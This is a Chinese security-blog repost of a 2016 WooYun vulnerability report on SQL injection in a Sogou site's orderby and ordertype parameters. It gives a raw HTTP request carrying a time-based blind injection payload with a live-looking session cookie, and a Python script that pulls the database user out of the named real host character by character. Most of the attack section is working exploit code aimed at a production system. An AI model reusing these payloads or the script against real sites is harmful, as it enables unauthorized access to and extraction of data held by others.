记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

搜狗某站存在SQL注入(附验证脚本)triblekill

2016-06-03 05:40

需要登录才行。

HTTP包如下

GET /Handlers/ScriptManager/ScriptHandler.ashx?_=1460630014907&action=getScriptList&currentPage=0&filter=%7B%22name%22:%22123%22%7D&groupId=-1&orderby=id&ordertype=desc,(select*from(select(if(ascii(substr(version(),1,1))=53,sleep(0),1)))a)&pageSize=20 HTTP/1.1

Host: mt.sogou.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: application/json, text/plain, */*

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

X-XSRF-TOKEN: 8efa41b7

Referer: http://mt.sogou.com/Pages/index.html

Cookie: ASP.NET_SessionId=tpdgtgwfhq5semvkc2eq1xpy;

Connection: close



参数orderby和ordertype存在注入

user():[email protected]

漏洞证明:

123.png





#encoding=utf-8



import httplib



import time



import string



import sys







headers = {



'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36',



}







payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')







print '[%s] Start to retrive MySQL database()' % time.strftime('%H:%M:%S', time.localtime())



database = ''



for i in range(1,25,1):



for payload in payloads:

try:

headers = {"Cookie": "ASP.NET_SessionId=tpdgtgwfhq5semvkc2eq1xpy"}

conn = httplib.HTTPConnection('mt.sogou.com:80', timeout=5)

conn.request(method='GET', url="/Handlers/TaskManager/TaskHandler.ashx?action=getTempList&currentPage=0&groupId=-1&orderby=createTime&ordertype=desc,(select*from(select(if(ascii(substr(user(),"+str(i)+",1))="+str(ord(payload))+",sleep(20),1)))a)&pageSize=20",headers=headers )

status = conn.getresponse().status

conn.close()



except :

database += payload



print '\r[scan in progress]' ,database



time.sleep(0.01)



break







print ''



print 'database() is', database





修复方案:

.


知识来源: www.wooyun.org/bugs/wooyun-2016-0196498

阅读:96516 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“搜狗某站存在SQL注入(附验证脚本)triblekill”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词